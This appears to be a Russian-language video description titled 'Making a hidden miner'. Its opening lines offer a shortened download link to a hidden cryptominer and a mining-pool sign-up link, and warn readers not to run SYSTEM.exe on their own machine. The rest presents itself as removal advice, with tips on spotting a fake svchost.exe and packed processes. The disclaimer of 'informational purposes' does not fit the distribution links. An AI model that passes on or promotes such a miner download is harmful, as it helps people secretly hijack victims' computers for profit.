Возникшие вопросы задавайте в комментариях, подскажу если что неясно
ССЫЛКА НА МАЙНЕР
http://catcut.net/O4Aw или http://catcut.net/O4Aw
Зарегистрируйся тут https://ru.minergate.com
ФАЙЛ SYSTEM.exe НЕ ОТКРЫВАТЬ, ИНАЧЕ ВЫ ЗАРАЗИТЕ МАЙНЕРОМ САМОГО СЕБЯ!
Делаем скрытый майнер
2018 год, а я до сих пор ничего не знаю о том, что такое майнинг, криптовалюта, не знаю как собрать майнинг ферму в 2018 , как майнить bitcoin , как майнить ethereum , но за то я знаю как себя обезопасить от скрытого майнинга.
Сейчас скрытый майнер может сделать любой школьник. Достаточно скачать готовые архивы, написать номер своего кошелька и все. Его модифицировали так, что он не отличается от троянского вируса : он может распространяться в сети, копировать сам себя на флешку, скрывать свои процессы в диспетчере задач и использовать машину на полную когда ей никто не пользуется. Да не каждый троян можно так адаптировать как адаптировали скрытые майнеры.
В этом видео речь пойдет не о создании скрытого майнера, а про его удаление, ведь антивирусы из-за новый методов создания скрытых майнеров не всегда способны их найти. Чаще всего скрытый майнер прячут под системный процесс svchost.exe . Запомните:
1) svchost.exe должен выполняться от имени системы, network и local сервисов. Если он запущен от имени какого либо пользователя то стоит проверить его место положение. Истинный файл находится в папке windows / system32 и нигде иначе. Он всегда имеет ту же разрядность в диспетчере задач какая в вашей операционной системе. То есть в x64 не может находиться svchost.exe x32
2) Лаги на компе, который исчезают если прервать соединение с интернетом. Это значит, что ресурсы вашего компьютера расходуются кем-то из вне. Стоит оборвать соединение и искать проблемы в системы.
3) Для поиска проблем используйте программу Process Hacker . Криптованные процессы или упакованные процессы - чаще всего скрытые майнеры выступают именно как "упакованный процесс" , который отображается розовым цветом в Process Hacker (packet procces). Ищите такие процессы и анализируйте их директорую. Чаще всего они прячутся от имени cmd.exe (скрытой командной строки).
Есть конечно и другие способы, но как показывает моя практика - достаточно и этих трех.
Ролик был создан исключительно в ознакомительных целях